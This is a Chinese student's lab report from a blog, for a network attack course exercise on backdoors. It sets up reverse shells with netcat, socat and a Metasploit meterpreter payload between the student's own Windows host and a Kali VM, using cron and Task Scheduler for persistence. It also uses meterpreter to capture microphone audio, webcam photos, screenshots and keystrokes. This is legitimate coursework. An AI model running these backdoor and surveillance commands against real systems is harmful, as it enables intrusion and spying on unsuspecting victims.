文档章节

2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践

o
 osc_fmg49rzg
发布于 2019/03/20 09:22
字数 1253
阅读 11
收藏 0

精选30+云产品,助力企业轻松上云!>>>

2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践


  • 一、实验说明

  • 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)

  • 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)

  • 任务三:使用MSF:meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

  • 任务四:使用MSF:meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分))

  • 实验准备

  • windows环境下下载老师提供的ncat和socat。

  • 使用ipconfig(windows下)和ipconfig(kali下)查询主机与虚拟机的IP地址(因为我没有2台电脑)

  • image

  • image

  • 知道了双方ip后,接下来就是使用ncat和socat这两个工具了,我们先用主机使用ncat.exe程序监听本机的5225端口:

  • 接着在Kali环境下,使用nc指令反向连接Windows主机的5225端口:

  • image

  • image

  • 发现成功获得kali的shell

  • 那么反过来呢,如何用kali获得主机的shell:

  • 我们先在kali下使用nc指令监听5225端口

  • 接着在主机下使用ncat.exe程序的-e选项项反向连接Kali主机的5225端口::

  • image

  • image

  • 结果也成功了

  • 我们如何使用nc传输数据呢?

  • windows下使用ncat.exe -l 5225监听5225端口

  • linux下使用ncat 192.168.6.1 5225链接(主机ip)

  • image

  • 很简单的就成功了

  • 体验 MSF Meterpreter 功能

  • 同样的,我们首先现在主机使用ncat.exe -l -p 5225启动监听5225端口

  • 然后用crontab -e指令编辑一条定时任务,在最后一行添加13 * * * * /bin/netcat 192.168.6.1 5225 -e /bin/sh,意思是在每个小时的第13分钟反向连接Windows主机的5225端口。

  • image

  • 可见13分后,主机获得了kali的shell

  • image

  • 同样的,反过来呢,让主机定时被kali获得shell:

  • 首先,我们在任务计划程序创建任务,填写任务名称,并新建一个触发器。

  • 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5225 exec:cmd.exe,pty,stderr

  • image

  • 我们使用windows + L键重新进入电脑,发现任务进程中已有我们创好的触发器:

  • image

  • 此时,在Kali环境下输入指令socat - tcp:192.168.6.1:5225,13分时我们可以发现kali已可成功获得了一个cmd shell:

  • image

  • 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.128 LPORT=5225 -f exe > 25test.exe生成后门程序

  • image

  • 通过nc指令将生成的后门程序传送到Windows主机上

  • image

  • 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

msfconsole下依次输入:

use exploit/multi/handler            
set payload windows/meterpreter/reverse_tcp  
show options                   
set LHOST 192.168.6.128            
set LPORT 5225                  
show options                  
exploit                       
  • 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

  • 使用record_mic指令可以截获一段音频:

  • image

  • 使用webcam_snap指令可以使用摄像头进行拍照:

  • image

  • 使用screenshot指令可以进行截屏:

  • image

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

  • image

  • 实验中遇到的问题及思考

  • 问题:如图,计算机积极拒绝链接,一开始以为是防火墙的问题或者是ssh未打开,上网查了好多方法都没有用

  • image

  • 解决方案:我打错了..少了端口号,加上就好了

  • 实验总结及体会

  • 本次实验我们简单了解和学习了一些后门工具的使用和如何通过他们来获得受害主机各种各样的权限;此次实验虽然内容简单,但我们对后门的基本原理了解却十分清晰,而且这次实验趣味性很强。

  • 二、基础问题回答

  • 问:例举你能想到的一个后门进入到你系统中的可能方式?

  • 网上下载软件时、收邮件时、使用来历不明的u盘或者光盘时

  • 问:例举你知道的后门如何启动起来(win及linux)的方式?

  • 修改注册表、设置为开机自启动、诱导用户点击或者光标划过、可以设为定时启动、启动绑定软件时启动

  • 问:Meterpreter有哪些给你映像深刻的功能?

  • 它获取权限之后简直可以完全执行受害主机的所有功能..

  • 问:如何发现自己有系统有没有被安装后门?

  • 可以检测网络连接,查看是否有IP与本机建立连接;安装专门的杀毒软件查看,看注册表有没有多出奇怪的东西;看任务运行列表是否有奇怪的任务

o
粉丝 0
博文 500
码字总数 0
作品 0
私信 提问
加载中
请先登录后再评论。
2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践

2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践 一 免杀原理与实践说明 (一)、实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用...

osc_eew3qbpd
2019/03/31
1
0
2018-2019-2 20165114《网络对抗技术》Exp2 后门原理与实践

目录 一、实验准备 二、实验内容 三、基础问题回答 四、实验过程及步骤 五、实验总结与体会 六、实验中遇到的问题与错误。 一、实验准备 1、后门概念 后门就是不经过正常认证流程而访问系统的...

osc_851bq07r
2019/03/21
5
0
2018-2019-2 20165315《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165315《网络对抗技术》Exp2 后门原理与实践 一、实验任务 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软...

osc_n6euf5h6
2019/03/19
1
0
2018-2019-2 《网络对抗技术》Exp2 后门原理与实践 20165222

Exp2 后门原理与实践 实验环境 win7ip地址为: 192.168.136.130 kali.ip地址为: 192.168.136.129 两台虚拟机可以ping通 实验步骤 1,使用netcat获取主机操作Shell,cron启动 (1)使用WIN7进...

osc_ejr8erbt
2019/03/24
1
0
2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其他软...

osc_pyq23enu
2019/03/22
5
0

没有更多内容

加载失败,请刷新页面

加载更多

等到所有jQuery Ajax请求都完成了吗? - Wait until all jQuery Ajax requests are done?

问题: How do I make a function wait until all jQuery Ajax requests are done inside another function? 我如何让一个函数等到所有jQuery Ajax请求都在另一个函数中完成之后? In short...

富含淀粉
33分钟前
17
0
OSChina 周日乱弹 —— 那么长的绳子,你这是放风筝呢

Osc乱弹歌单(2020)请戳(这里) 【今日歌曲】 @ 巴拉迪维:黑豹乐队的单曲《无地自容》 耳畔突然响起旋律,是那首老歌。中国摇滚有了《一无所有》不再一无所有;中国摇滚有了《无地自容》不...

小小编辑
今天
65
1
《吐血整理》-顶级程序员书单集

你知道的越多,你不知道的越多 给岁月以文明,而不是给文明以岁月 前言 王潇:格局决定了一个人的梦想,梦想反过来决定行为。 那格局是什么呢? 格局是你能够看见的深度、广度和密度。 王潇认...

敖丙
2019/12/11
15
0
我可以在Android版式中加下划线吗? - Can I underline text in an Android layout?

问题: 如何在Android布局xml文件中定义带下划线的文本? 解决方案: 参考一: https://stackoom.com/question/A31z/我可以在Android版式中加下划线吗 参考二: https://oldbug.net/q/A31z/...

法国红酒甜
今天
26
0
干掉ELK | 使用Prometheus+Grafana搭建监控平台

什么是Prometheus? Prometheus是由SoundCloud开发的开源监控报警系统和时序列数据库(TSDB)。Prometheus使用Go语言开发,是Google BorgMon监控系统的开源版本。 Prometheus的特点 · 多维度...

木九天
今天
34
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部